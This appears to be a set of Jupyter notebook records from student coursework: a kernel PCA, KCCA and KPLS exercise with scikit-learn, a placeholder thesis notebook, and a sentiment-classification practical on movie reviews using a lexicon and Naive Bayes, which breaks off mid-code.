For this exercise, we are going to consider a Radial Basis Function kernel (RBF), where each element of the kernel matrix is given by $k(x_i,x_j) = \\exp (- \\gamma (x_i -x_j)^2)$.\n\nIn particular, we need to compute two kernel matrix:\n* Training data kernel matrix (K_tr) where the RBF is compute pairwise over the training data. The resulting matrix dimension is of $N_{tr} \\times N_{tr}$, being $N_{tr}$ the number of training data.\n* Test data kernel matrix (K_test) where the RBF is compute between training and test samples, i.e., in RBF expression the data $x_i$ belongs to test data whereas $x_j$ belongs to training data. The resulting matrix dimension is of $N_{test} \\times N_{tr}$, being $N_{test}$ and $N_{tr}$ the number of test and training data, respectively.\n\nUse the [rbf_kernel( )](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.rbf_kernel.html) function to compute the K_tr and K_test kernel matrix. Fix the kernel width value (gamma) to 1.", "_____no_output_____" ] ], [ [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\n\n# Computing the kernel matrix\nfrom sklearn.metrics.pairwise import rbf_kernel\n\ng_value = 1\n\n# Compute the kernel matrix (use the X_train matrix, before dividing it in validation and training data)\nK_tr = rbf_kernel(X_train, X_train, gamma=g_value)\nK_test = rbf_kernel(X_test, X_train, gamma=g_value)", "_____no_output_____" ], [ "###########################################################\n# TEST CELL\n###########################################################\nfrom test_helper import Test\n\n# TEST Training and test data generation\nTest.assertEquals(K_tr.shape, (450,450), 'incorrect result: dimensions of training kernel matrix are uncorrect')\nTest.assertEquals(K_test.shape, (150,450), 'incorrect result: dimensions of test kernel matrix are uncorrect')", "1 test passed.\n1 test passed.\n" ] ], [ [ "After compute these kernel matrix, they have to be centered (in the same way that we remove the mean when we work over the input space). For this purpose, next code provides you the function center_K(). 
Use it properly to remove the mean of both K_tr and K_test matrix.", "_____no_output_____" ] ], [ [ "def center_K(K):\n \"\"\"Center a kernel matrix K, i.e., removes the data mean in the feature space.\n\n Args:\n K: kernel matrix \n \"\"\"\n size_1,size_2 = K.shape;\n D1 = K.sum(axis=0)/size_1 \n D2 = K.sum(axis=1)/size_2\n E = D2.sum(axis=0)/size_1\n\n K_n = K + np.tile(E,[size_1,size_2]) - np.tile(D1,[size_1,1]) - np.tile(D2,[size_2,1]).T\n return K_n", "_____no_output_____" ], [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\n\n# Center the kernel matrix\nK_tr_c = center_K(K_tr)\nK_test_c = center_K(K_test)", "_____no_output_____" ], [ "###########################################################\n# TEST CELL\n###########################################################\nfrom test_helper import Test\n\n# TEST Training and test data generation\nTest.assertEquals(np.round(K_tr_c[0][0],2), 0.55, 'incorrect result: centered training kernel matrix is uncorrect')\nTest.assertEquals(np.round(K_test_c[0][0],2), -0.24, 'incorrect result: centered test kernel matrix is uncorrect')", "1 test passed.\n1 test passed.\n" ] ], [ [ "** Alternative KPCA formulation **\n\nComplete the following code lines to obtain a KPCA implementaion using the linear PCA function and the kernel matrix as input data. Later, compare its result with that of the KPCA function.", "_____no_output_____" ] ], [ [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\nfrom sklearn.decomposition import PCA\nfrom sklearn.decomposition import KernelPCA\nfrom sklearn import svm\n\n# Defining parameters\nN_feat_max = 2\n\n\n## PCA method (to complete)\n# 1. Train PCA with the kernel matrix and project the data\npca_K2 = PCA(n_components=N_feat_max)\npca_K2.fit(K_tr_c, Y_train) \nP_train_k2 = pca_K2.transform(K_tr_c) \nP_test_k2 = pca_K2.transform(K_test_c)\n \n# 2. Evaluate the projection performance\nclf = svm.SVC(kernel='linear')\nclf.fit(P_train_k2, Y_train)\nprint 'Test accuracy with PCA with a kenel matrix as input: '+ str(clf.score(P_test_k2, Y_test))\n\n## KPCA method (for comparison purposes)\n# 1. Train KPCA and project the data\n# Fixing gamma to 0.5 here, it is equivalent to gamma=1 in rbf function\npca_K = KernelPCA(n_components=N_feat_max, kernel=\"rbf\", gamma=0.5) \npca_K.fit(X_train)\nP_train_k = pca_K.transform(X_train)\nP_test_k = pca_K.transform(X_test)\n \n# 2. Evaluate the projection performance\nclf = svm.SVC(kernel='linear')\nclf.fit(P_train_k, Y_train)\nprint 'Test accuracy with KPCA: '+ str(clf.score(P_test_k, Y_test))\n", "Test accuracy with PCA with a kenel matrix as input: 0.946666666667\nTest accuracy with KPCA: 0.96\n" ] ], [ [ "** Alternative KPLS and KCCA formulations **\n\nUse the PLS and CCA methods with the kernel matrix to obtain no-linear (or kernelized) supervised feature extractors.", "_____no_output_____" ] ], [ [ "###########################################################\n# KCCA\n###########################################################\nfrom lib.mva import mva\n\n# Defining parameters\nN_feat_max = 2\n\n\n## PCA method (to complete)\n# 1. Train PCA with the kernel matrix and project the data\nCCA = mva('CCA', N_feat_max)\nCCA.fit(K_tr_c, Y_train,reg=1e-2) \nP_train_k2 = CCA.transform(K_tr_c) \nP_test_k2 = CCA.transform(K_test_c)\n \n# 2. 
Evaluate the projection performance\nclf = svm.SVC(kernel='rbf', C=C, gamma=gamma)\nclf.fit(P_train_k2, Y_train)\nprint 'Test accuracy with PCA with a kenel matrix as input: '+ str(clf.score(P_test_k2, Y_test))\n\n\n###########################################################\n# KPLS\n###########################################################\nfrom sklearn.cross_decomposition import PLSSVD\n# Defining parameters\nN_feat_max = 100\n\n\n## PCA method (to complete)\n# 1. Train PCA with the kernel matrix and project the data\npls = PLSSVD(n_components=N_feat_max)\npls.fit(K_tr_c, Y_train_bin) \nP_train_k2 = CCA.transform(K_tr_c) \nP_test_k2 = CCA.transform(K_test_c)\n \n# 2. Evaluate the projection performance\nclf = svm.SVC(kernel='rbf', C=C, gamma=gamma)\nclf.fit(P_train_k2, Y_train)\nprint 'Test accuracy with PCA with a kenel matrix as input: '+ str(clf.score(P_test_k2, Y_test))\n\n", "_____no_output_____" ] ] ]
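The kernel-centering step in this record can also be done with library code: scikit-learn's `KernelCenterer` removes the feature-space mean using the statistics of the training kernel, which is the role the notebook's `center_K()` helper plays. The sketch below reuses the notebook's `X_train`/`X_test` split and the gamma value of 1 fixed in the exercise.

```python
from sklearn.metrics.pairwise import rbf_kernel
from sklearn.preprocessing import KernelCenterer

gamma = 1.0
K_tr = rbf_kernel(X_train, X_train, gamma=gamma)    # shape (n_train, n_train)
K_test = rbf_kernel(X_test, X_train, gamma=gamma)   # shape (n_test, n_train)

# Fit on the square training kernel, then center any kernel whose columns are
# computed against the same training points.
centerer = KernelCenterer().fit(K_tr)
K_tr_c = centerer.transform(K_tr)
K_test_c = centerer.transform(K_test)
```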
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1c6ca05f52820ce5cbf4f608ce5dd4e7ef6058
1,539
ipynb
Jupyter Notebook
notebooks/PhD_Methodology_Overview.ipynb
Aelvangunduz/phd_code
b8dc7d8cfe647e791820519ff51f10d9b0f42845
[ "FTL" ]
null
null
null
notebooks/PhD_Methodology_Overview.ipynb
Aelvangunduz/phd_code
b8dc7d8cfe647e791820519ff51f10d9b0f42845
[ "FTL" ]
null
null
null
notebooks/PhD_Methodology_Overview.ipynb
Aelvangunduz/phd_code
b8dc7d8cfe647e791820519ff51f10d9b0f42845
[ "FTL" ]
null
null
null
22.304348
254
0.48538
[ [ [ "<a href=\"https://colab.research.google.com/github/Aelvangunduz/phd_code/blob/master/notebooks/PhD_Methodology_Overview.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "# Problem Definition", "_____no_output_____" ], [ "Lorem Ipsum", "_____no_output_____" ], [ "# Methodology Definition", "_____no_output_____" ], [ "# Literature Review", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1c7376bef9ec2827f6a252d87f252768fd76f2
104,750
ipynb
Jupyter Notebook
Natural Language Processing 1/nlp1_v2.ipynb
PhilLint/Master
c7bc03273c24411575e34c98d768408a14d17a3f
[ "MIT" ]
1
2020-09-20T20:02:20.000Z
2020-09-20T20:02:20.000Z
Natural Language Processing 1/nlp1_v2.ipynb
PhilLint/Master
c7bc03273c24411575e34c98d768408a14d17a3f
[ "MIT" ]
null
null
null
Natural Language Processing 1/nlp1_v2.ipynb
PhilLint/Master
c7bc03273c24411575e34c98d768408a14d17a3f
[ "MIT" ]
null
null
null
37.856885
10,324
0.595714
[ [ [ "Practical 1: Sentiment Detection of Movie Reviews\n========================================\n\n", "_____no_output_____" ], [ "This practical concerns sentiment detection of movie reviews.\nIn [this file](https://gist.githubusercontent.com/bastings/d47423301cca214e3930061a5a75e177/raw/5113687382919e22b1f09ce71a8fecd1687a5760/reviews.json) (80MB) you will find 1000 positive and 1000 negative **movie reviews**.\nEach review is a **document** and consists of one or more sentences.\n\nTo prepare yourself for this practical, you should\nhave a look at a few of these texts to understand the difficulties of\nthe task (how might one go about classifying the texts?); you will write\ncode that decides whether a random unseen movie review is positive or\nnegative.\n\nPlease make sure you have read the following paper:\n\n> Bo Pang, Lillian Lee, and Shivakumar Vaithyanathan\n(2002). \n[Thumbs up? Sentiment Classification using Machine Learning\nTechniques](https://dl.acm.org/citation.cfm?id=1118704). EMNLP.\n\nBo Pang et al. were the \"inventors\" of the movie review sentiment\nclassification task, and the above paper was one of the first papers on\nthe topic. The first version of your sentiment classifier will do\nsomething similar to Bo Pang’s system. If you have questions about it,\nwe should resolve them in our first demonstrated practical.\n", "_____no_output_____" ], [ "**Advice**\n\nPlease read through the entire practical and familiarise\nyourself with all requirements before you start coding or otherwise\nsolving the tasks. Writing clean and concise code can make the difference\nbetween solving the assignment in a matter of hours, and taking days to\nrun all experiments.\n\n**Environment**\n\nAll code should be written in **Python 3**. \nIf you use Colab, check if you have that version with `Runtime -> Change runtime type` in the top menu.\n\n> If you want to work in your own computer, then download this notebook through `File -> Download .ipynb`.\nThe easiest way to\ninstall Python is through downloading\n[Anaconda](https://www.anaconda.com/download). \nAfter installation, you can start the notebook by typing `jupyter notebook filename.ipynb`.\nYou can also use an IDE\nsuch as [PyCharm](https://www.jetbrains.com/pycharm/download/) to make\ncoding and debugging easier. 
It is good practice to create a [virtual\nenvironment](https://docs.python.org/3/tutorial/venv.html) for this\nproject, so that any Python packages don’t interfere with other\nprojects.\n\n#### Learning Python 3\n\nIf you are new to Python 3, you may want to check out a few of these resources:\n- https://learnxinyminutes.com/docs/python3/\n- https://www.learnpython.org/\n- https://docs.python.org/3/tutorial/", "_____no_output_____" ], [ "Loading the Data\n-------------------------------------------------------------", "_____no_output_____" ] ], [ [ "# download sentiment lexicon\n!wget https://gist.githubusercontent.com/bastings/d6f99dcb6c82231b94b013031356ba05/raw/f80a0281eba8621b122012c89c8b5e2200b39fd6/sent_lexicon\n# download review data\n!wget https://gist.githubusercontent.com/bastings/d47423301cca214e3930061a5a75e177/raw/5113687382919e22b1f09ce71a8fecd1687a5760/reviews.json", "_____no_output_____" ], [ "import math\nimport os\nimport sys\nfrom subprocess import call\nfrom nltk import FreqDist\nfrom nltk.util import ngrams\nfrom nltk.stem.porter import PorterStemmer\nimport sklearn as sk\n#from google.colab import drive\nimport pickle\nimport json\nfrom collections import Counter\nimport requests\nimport matplotlib.pyplot as plt\nimport numpy as np", "_____no_output_____" ], [ "# load reviews into memory\n# file structure:\n# [\n# {\"cv\": integer, \"sentiment\": str, \"content\": list} \n# {\"cv\": integer, \"sentiment\": str, \"content\": list} \n# ..\n# ]\n# where `content` is a list of sentences, \n# with a sentence being a list of (token, pos_tag) pairs.\n\n# For documentation on POS-tags, see \n# https://catalog.ldc.upenn.edu/docs/LDC99T42/tagguid1.pdf\n\nwith open(\"reviews.json\", mode=\"r\", encoding=\"utf-8\") as f:\n reviews = json.load(f)\n \nprint(len(reviews))\n\ndef print_sentence_with_pos(s):\n print(\" \".join(\"%s/%s\" % (token, pos_tag) for token, pos_tag in s))\n\nfor i, r in enumerate(reviews):\n print(r[\"cv\"], r[\"sentiment\"], len(r[\"content\"])) # cv, sentiment, num sents\n print_sentence_with_pos(r[\"content\"][0])\n if i == 4: \n break\n \nc = Counter()\nfor review in reviews:\n for sentence in review[\"content\"]:\n for token, pos_tag in sentence:\n c[token.lower()] += 1\n\nprint(\"#types\", len(c))\n\nprint(\"Most common tokens:\")\nfor token, count in c.most_common(25):\n print(\"%10s : %8d\" % (token, count))\n ", "2000\n0 NEG 29\nTwo/CD teen/JJ couples/NNS go/VBP to/TO a/DT church/NN party/NN ,/, drink/NN and/CC then/RB drive/NN ./.\n1 NEG 11\nDamn/JJ that/IN Y2K/CD bug/NN ./.\n2 NEG 24\nIt/PRP is/VBZ movies/NNS like/IN these/DT that/WDT make/VBP a/DT jaded/JJ movie/NN viewer/NN thankful/JJ for/IN the/DT invention/NN of/IN the/DT Timex/NNP IndiGlo/NNP watch/NN ./.\n3 NEG 19\nQUEST/NN FOR/IN CAMELOT/NNP ``/`` Quest/NNP for/IN Camelot/NNP ''/'' is/VBZ Warner/NNP Bros./NNP '/POS first/JJ feature-length/JJ ,/, fully-animated/JJ attempt/NN to/TO steal/VB clout/NN from/IN Disney/NNP 's/POS cartoon/NN empire/NN ,/, but/CC the/DT mouse/NN has/VBZ no/DT reason/NN to/TO be/VB worried/VBN ./.\n4 NEG 38\nSynopsis/NNPS :/: A/DT mentally/RB unstable/JJ man/NN undergoing/VBG psychotherapy/NN saves/VBZ a/DT boy/NN from/IN a/DT potentially/RB fatal/JJ accident/NN and/CC then/RB falls/VBZ in/IN love/NN with/IN the/DT boy/NN 's/POS mother/NN ,/, a/DT fledgling/NN restauranteur/NN ./.\n#types 47743\nMost common tokens:\n , : 77842\n the : 75948\n . 
: 59027\n a : 37583\n and : 35235\n of : 33864\n to : 31601\n is : 25972\n in : 21563\n 's : 18043\n it : 15904\n that : 15820\n -rrb- : 11768\n -lrb- : 11670\n as : 11312\n with : 10739\n for : 9816\n his : 9542\n this : 9497\n film : 9404\n '' : 9282\n he : 8804\n `` : 8801\n i : 8619\n but : 8537\n" ] ], [ [ "Symbolic approach – sentiment lexicon (2pts)\n---------------------------------------------------------------------\n\n", "_____no_output_____" ], [ "**How** could one automatically classify movie reviews according to their\nsentiment? \n\nIf we had access to a **sentiment lexicon**, then there are ways to solve\nthe problem without using Machine Learning. One might simply look up\nevery open-class word in the lexicon, and compute a binary score\n$S_{binary}$ by counting how many words match either a positive, or a\nnegative word entry in the sentiment lexicon $SLex$.\n\n$$S_{binary}(w_1w_2...w_n) = \\sum_{i = 1}^{n}\\text{sgn}(SLex\\big[w_i\\big])$$\n\n**Threshold.** In average there are more positive than negative words per review (~7.13 more positive than negative per review) to take this bias into account you should use a threshold of **8** (roughly the bias itself) to make it harder to classify as positive.\n\n$$\n\\text{classify}(S_{binary}(w_1w_2...w_n)) = \\bigg\\{\\begin{array}{ll}\n \\text{positive} & \\text{if } S_{binary}(w_1w_2...w_n) > threshold\\\\\n \\text{negative} & \\text{else }\n \\end{array}\n$$\n\nTo implement this approach, you should use the sentiment\nlexicon in `sent_lexicon`, which was taken from the\nfollowing work:\n\n> Theresa Wilson, Janyce Wiebe, and Paul Hoffmann\n(2005). [Recognizing Contextual Polarity in Phrase-Level Sentiment\nAnalysis](http://www.aclweb.org/anthology/H/H05/H05-1044.pdf). HLT-EMNLP.", "_____no_output_____" ], [ "\n#### (Q: 1.1) Implement this approach and report its classification accuracy. (1 pt)", "_____no_output_____" ], [ "##### This block loads the lexicon file and stores the sentiments and word types as dictionaries", "_____no_output_____" ] ], [ [ "#\n# Given a line from the sentiment file \n# ex. type=weaksubj len=1 word1=abandoned pos1=adj stemmed1=n priorpolarity=negative\n# Returns a dictionary \n# ex. 
{type: weaksubj, len: 1, word1: abandoned, pos1: adj, stemmed1: n, priorpolarity: negative}\n#\ndef sentiment_line_to_dict(line):\n dictionary = {}\n \n words = line.split()\n for word in words:\n variable_assignment = word.split('=')\n variable = variable_assignment[0]\n value = variable_assignment[1]\n \n dictionary[variable] = value\n \n return dictionary\n\n#\n# Adds the word with the sentiment to the dictionary.\n# If the word is already in the dictionary and the sentiments are conflicting, \n# the sentiment will be set to 0 (neutral).\n#\ndef add_sentiment_to_dict(sentiment_dict, word, sentiment):\n if word in sentiment_dict.keys():\n if not sentiment_dict[word] == sentiment:\n sentiment_dict[word] = 0\n else:\n sentiment_dict[word] = sentiment\n \n return sentiment_dict\n\n#\n# Adds the word with the type to the dictionary.\n# If the word is already in the dictionary and the types are conflicting, \n# the type will be set to 2 (neutral).\n#\ndef add_type_to_dict(type_dict, word, word_type):\n if word in type_dict.keys():\n if not type_dict[word] == word_type:\n type_dict[word] = 2\n else:\n type_dict[word] = word_type\n \n return type_dict\n\n\n#\n# Converts a sentiment string: \"positive\", \"negative\", \"neutral\" to 1, -1 and 0 respectively.\n#\ndef sentiment_to_score(sentiment_as_string):\n if sentiment_as_string == 'positive':\n return 1\n if sentiment_as_string == 'negative':\n return -1\n return 0\n\n\n#\n# Converts a type string: \"strongsubj\", \"weaksubj\" to 2, and 1 respectively.\n#\ndef type_to_score(type_as_string):\n if type_as_string == 'strongsubj':\n return 3\n if type_as_string == 'weaksubj':\n return 1\n \n return 1\n \n \n#\n# Parses the lexicon file and return 2 dictionaries:\n# sentiment_dict with structure: { \"love\": 1, \"hate\": -1, \"butter\": 0 ... }\n# 1 is positive, -1 is negative, 0 is neutral.\n#\n# type_dict with structure: { \"love\": 2, \"hate\": 1, \"butter\": 1.5 ... 
} \n# 2 is a strong type, 1 is a weak type and 1.5 is a word that had both types in the file.\n#\ndef parse_lexicon_to_dicts():\n with open(\"sent_lexicon\", mode=\"r\", encoding=\"utf-8\") as file:\n array_of_lines = file.readlines()\n \n sentiment_dict = {}\n type_dict = {}\n \n for line in array_of_lines:\n line_as_dict = sentiment_line_to_dict(line)\n \n word = line_as_dict['word1']\n word_type = type_to_score(line_as_dict['type'])\n sentiment = sentiment_to_score(line_as_dict['priorpolarity'])\n \n sentiment_dict = add_sentiment_to_dict(sentiment_dict, word, sentiment)\n type_dict = add_type_to_dict(type_dict, word, word_type)\n \n return sentiment_dict, type_dict\n\n\nsentiment_dict, type_dict = parse_lexicon_to_dicts() \nprint(\"Loaded the file!\")\n", "Loaded the file!\n" ] ], [ [ "##### This block contains the binary classification code", "_____no_output_____" ] ], [ [ "THRESHOLD = 8\n\n\n#\n# Given a review returns a list of all the words.\n# note: all words are converted to lowercase\n#\ndef get_words_of_review(review):\n content = review['content']\n \n words = []\n for line in content:\n for word_pair in line:\n word = word_pair[0]\n word_in_lowercase = word.lower()\n words.append(word_in_lowercase)\n \n return words\n\n\n#\n# Returns the binary (unaltered) score of the word;\n# 1 for positive, -1 for negative, 0 for neutral or not found.\n#\ndef get_binary_score_of_word(word):\n try:\n return sentiment_dict[word]\n except KeyError:\n # Word not in our dictionary.\n return 0\n\n\n#\n# Given a review returns the real sentiment.\n# -1 for negative, 1 for positive.\n#\ndef get_real_sentiment_of_review(review):\n if (review['sentiment'] == 'NEG'):\n return -1\n \n return 1\n \n \n#\n# Given a review returns 1 if it classifies it as positive, and -1 otherwise.\n#\ndef binary_classify_review(review):\n words = get_words_of_review(review)\n \n score = 0\n for word in words:\n score += get_binary_score_of_word(word)\n \n if score > THRESHOLD:\n return 1\n \n return -1\n \n\n#\n# Returns token_results which is a list of wheter our predictions were correct: ['-', '+', '-', ...]\n# And returns the accuracy as a percentage, e.g. 45 for 45% accuracy.\n#\ndef binary_classify_all_reviews():\n total = 0\n correct = 0\n token_results = []\n \n for review in reviews:\n prediction = binary_classify_review(review)\n real_sentiment = get_real_sentiment_of_review(review)\n \n if prediction == real_sentiment:\n correct += 1\n token_results.append('+')\n else:\n token_results.append('-')\n \n total += 1\n \n accuracy = correct / total * 100\n return accuracy, token_results\n\n", "_____no_output_____" ], [ "binary_accuracy, binary_results = binary_classify_all_reviews()\nprint(\"Binary classification accuracy: {0:.2f}%\".format(binary_accuracy))", "Binary classification accuracy: 68.45%\n" ] ], [ [ "If the sentiment lexicon also has information about the **magnitude** of\nsentiment (e.g., *“excellent\"* would have higher magnitude than\n*“good\"*), we could take a more fine-grained approach by adding up all\nsentiment scores, and deciding the polarity of the movie review using\nthe sign of the weighted score $S_{weighted}$.\n\n$$S_{weighted}(w_1w_2...w_n) = \\sum_{i = 1}^{n}SLex\\big[w_i\\big]$$\n\n\nTheir lexicon also records two possible magnitudes of sentiment (*weak*\nand *strong*), so you can implement both the binary and the weighted\nsolutions (please use a switch in your program). 
For the weighted\nsolution, you can choose the weights intuitively *once* before running\nthe experiment.\n\n#### (Q: 1.2) Now incorporate magnitude information and report the classification accuracy. Don't forget to use the threshold. (1 pt)", "_____no_output_____" ] ], [ [ "#\n# Returns the weighted score of the word;\n# it multiplies the original score of the word with the type (strong 3, neutral 2, or weak 1).\n#\ndef get_weighted_score_of_word(word):\n try:\n score = sentiment_dict[word]\n word_type = type_dict[word]\n return word_type * score\n \n except KeyError:\n # Word not in our dictionary.\n return 0\n\n \n#\n# Given a review returns 1 if it classifies it as positive, and -1 otherwise.\n#\ndef weighted_classify_review(review):\n words = get_words_of_review(review)\n \n score = 0\n for word in words:\n score += get_weighted_score_of_word(word)\n \n if score > THRESHOLD:\n return 1\n \n return -1\n\n\n#\n# Returns token_results which is a list of wheter our predictions were correct: ['-', '+', '-', ...]\n# And returns the accuracy as a percentage, e.g. 45 for 45% accuracy.\n#\ndef weighted_classify_all_reviews():\n total = 0\n correct = 0\n token_results = []\n \n for review in reviews:\n prediction = weighted_classify_review(review)\n real_sentiment = get_real_sentiment_of_review(review)\n \n if prediction == real_sentiment:\n correct += 1\n token_results.append('+')\n else:\n token_results.append('-')\n \n total += 1\n \n accuracy = correct / total * 100\n return accuracy, token_results\n\n", "_____no_output_____" ], [ "magnitude_accuracy, magnitude_results = weighted_classify_all_reviews()\nprint(\"Magnitude classification accuracy: {0:.2f}%\".format(magnitude_accuracy))", "Magnitude classification accuracy: 68.80%\n" ] ], [ [ "#### Optional: make a barplot of the two results.", "_____no_output_____" ] ], [ [ "\nplt.bar(\"Binary\", binary_accuracy)\nplt.bar(\"Magnitude\", magnitude_accuracy)\nplt.ylabel(\"Accuracy in %\")\nplt.title(\"Accuracy of binary and magnitude classification\")\n\nplt.show()\n", "_____no_output_____" ] ], [ [ "Answering questions in statistically significant ways (1pt)\n-------------------------------------------------------------", "_____no_output_____" ], [ "Does using the magnitude improve the results? Oftentimes, answering questions like this about the performance of\ndifferent signals and/or algorithms by simply looking at the output\nnumbers is not enough. When dealing with natural language or human\nratings, it’s safe to assume that there are infinitely many possible\ninstances that could be used for training and testing, of which the ones\nwe actually train and test on are a tiny sample. Thus, it is possible\nthat observed differences in the reported performance are really just\nnoise. \n\nThere exist statistical methods which can be used to check for\nconsistency (*statistical significance*) in the results, and one of the\nsimplest such tests is the **sign test**. \n\nThe sign test is based on the binomial distribution. Count all cases when System 1 is better than System 2, when System 2 is better than System 1, and when they are the same. Call these numbers $Plus$, $Minus$ and $Null$ respectively. \n\nThe sign test returns the probability that the null hypothesis is true. 
\n\nThis probability is called the $p$-value and it can be calculated for the two-sided sign test using the following formula (we multiply by two because this is a two-sided sign test and tests for the significance of differences in either direction):\n\n$$2 \\, \\sum\\limits_{i=0}^{k} \\binom{N}{i} \\, q^i \\, (1-q)^{N-i}$$\n\nwhere $$N = 2 \\Big\\lceil \\frac{Null}{2}\\Big\\rceil + Plus + Minus$$ is the total\nnumber of cases, and\n$$k = \\Big\\lceil \\frac{Null}{2}\\Big\\rceil + \\min\\{Plus,Minus\\}$$ is the number of\ncases with the less common sign. \n\nIn this experiment, $q = 0.5$. Here, we\ntreat ties by adding half a point to either side, rounding up to the\nnearest integer if necessary. \n\n\n#### (Q 2.1): Implement the sign test. Is the difference between the two symbolic systems significant? What is the p-value? (1 pt)\n\nYou should use the `comb` function from `scipy` and the `decimal` package for the stable adding of numbers in the final summation.\n\nYou can quickly verify the correctness of\nyour sign test code using a [free online\ntool](https://www.graphpad.com/quickcalcs/binomial1.cfm).", "_____no_output_____" ] ], [ [ "from decimal import Decimal\nfrom scipy.misc import comb\n\n\ndef sign_test(results_1, results_2):\n \"\"\"test for significance\n results_1 is a list of classification results (+ for correct, - incorrect)\n results_2 is a list of classification results (+ for correct, - incorrect)\n \"\"\"\n ties, plus, minus = 0, 0, 0\n\n # \"-\" carries the error\n for i in range(0, len(results_1)):\n if results_1[i]==results_2[i]:\n ties += 1\n elif results_1[i]==\"-\": \n plus += 1\n elif results_2[i]==\"-\": \n minus += 1\n\n n = Decimal(2 * math.ceil(ties / 2.) + plus + minus)\n \n k = Decimal(math.ceil(ties / 2.) + min(plus, minus))\n\n summation = Decimal(0.0)\n for i in range(0,int(k)+1):\n summation += Decimal(comb(n, i, exact=True))\n\n # use two-tailed version of test\n summation *= 2\n summation *= (Decimal(0.5)**Decimal(n))\n\n print(\"the difference is\", \n \"not significant\" if summation >= 0.05 else \"significant\")\n\n return summation\n\np_value = sign_test(binary_results, magnitude_results)\nprint(\"p_value =\", p_value)", "/usr/local/Cellar/ipython/7.1.1/libexec/vendor/lib/python3.7/site-packages/ipykernel_launcher.py:27: DeprecationWarning: `comb` is deprecated!\nImporting `comb` from scipy.misc is deprecated in scipy 1.0.0. Use `scipy.special.comb` instead.\n" ] ], [ [ "## Using the Sign test\n\n**From now on, report all differences between systems using the\nsign test.** You can think about a change that you apply to one system, as a\n new system.\n \nYou should report statistical test\nresults in an appropriate form – if there are several different methods\n(i.e., systems) to compare, tests can only be applied to pairs of them\nat a time. This creates a triangular matrix of test results in the\ngeneral case. When reporting these pair-wise differences, you should\nsummarise trends to avoid redundancy.\n", "_____no_output_____" ], [ "Naive Bayes (8pt + 1pt bonus)\n==========", "_____no_output_____" ], [ "\nYour second task is to program a simple Machine Learning approach that operates\non a simple Bag-of-Words (BoW) representation of the text data, as\ndescribed in Pang et al. (2002). In this approach, the only features we\nwill consider are the words in the text themselves, without bringing in\nexternal sources of information. 
The BoW model is a popular way of\nrepresenting text information as vectors (or points in space), making it\neasy to apply classical Machine Learning algorithms on NLP tasks.\nHowever, the BoW representation is also very crude, since it discards\nall information related to word order and grammatical structure in the\noriginal text.\n\n## Writing your own classifier\n\nWrite your own code to implement the Naive Bayes (NB) classifier. As\na reminder, the Naive Bayes classifier works according to the following\nequation:\n$$\\hat{c} = \\operatorname*{arg\\,max}_{c \\in C} P(c|\\bar{f}) = \\operatorname*{arg\\,max}_{c \\in C} P(c)\\prod^n_{i=1} P(f_i|c)$$\nwhere $C = \\{ \\text{POS}, \\text{NEG} \\}$ is the set of possible classes,\n$\\hat{c} \\in C$ is the most probable class, and $\\bar{f}$ is the feature\nvector. Remember that we use the log of these probabilities when making\na prediction:\n$$\\hat{c} = \\operatorname*{arg\\,max}_{c \\in C} \\Big\\{\\log P(c) + \\sum^n_{i=1} \\log P(f_i|c)\\Big\\}$$\n\nYou can find more details about Naive Bayes in [Jurafsky &\nMartin](https://web.stanford.edu/~jurafsky/slp3/). You can also look at\nthis helpful\n[pseudo-code](https://nlp.stanford.edu/IR-book/html/htmledition/naive-bayes-text-classification-1.html).\n\n*Note: this section and the next aim to put you a position to replicate\n Pang et al., Naive Bayes results. However, the numerical results\n will differ from theirs, as they used different data.*\n\n**You must write the Naive Bayes training and prediction code from\nscratch.** You will not be given credit for using off-the-shelf Machine\nLearning libraries.\n\nThe data contains the text of the reviews, where each document consists\nof the sentences in the review, the sentiment of the review and an index\n(cv) that you will later use for cross-validation. You will find the\ntext has already been tokenised and POS-tagged for you. Your algorithm\nshould read in the text, **lowercase it**, and store the words and their\nfrequencies in an appropriate data structure that allows for easy\ncomputation of the probabilities used in the Naive Bayes algorithm, and\nthen make predictions for new instances.", "_____no_output_____" ], [ "#### (Q3.1) Train your classifier on (positive and negative) reviews with cv-value 000-899, and test it on the remaining reviews cv900–cv999. Report results using simple classification accuracy as your evaluation metric. Your features are the word vocabulary. The value of a feature is the count of that feature (word) in the document. (2pts)\n", "_____no_output_____" ], [ "The following code block contains our BagOfWords class", "_____no_output_____" ] ], [ [ "#\n# This class represents our bag of words. 
It stores the words in a dictionary in the following format:\n# BOW = {\n# 'cat': {\n# 'POS': 3, # 3 positive occurences\n# 'NEG': 1, # 1 negative occurences\n# 'P_POS': 0.001 # probability of this word occuring in positive review\n# 'P_NEG': 0.00033 # probability of this word occuring in negative review\n# }, \n# 'dog': {\n# etc..\n# }\n#\nclass BagOfWords:\n \n def __init__(self, positive_prior):\n self.positive_prior = positive_prior\n self.total_positive_words = 0\n self.total_negative_words = 0\n self.bag_of_words = {}\n \n #\n # Adds a words to the BOW, if it is already in the BOW it will increment the occurence of the word.\n #\n def add_word(self, word, sentiment):\n # Keep a count of total number of positive and negative words.\n if sentiment == 'POS':\n self.count_positive_word()\n else:\n self.count_negative_word()\n \n # If the word is not yet in our bag of words:\n # Initialize the word with 0 POS and 0 NEG occurences.\n if not word in self.bag_of_words.keys():\n self.bag_of_words[word] = {}\n self.bag_of_words[word]['POS'] = 0\n self.bag_of_words[word]['NEG'] = 0\n \n self.bag_of_words[word][sentiment] += 1\n \n \n #\n # Adds the P_POS and P_NEG to the BOW.\n #\n def add_probabilities(self, 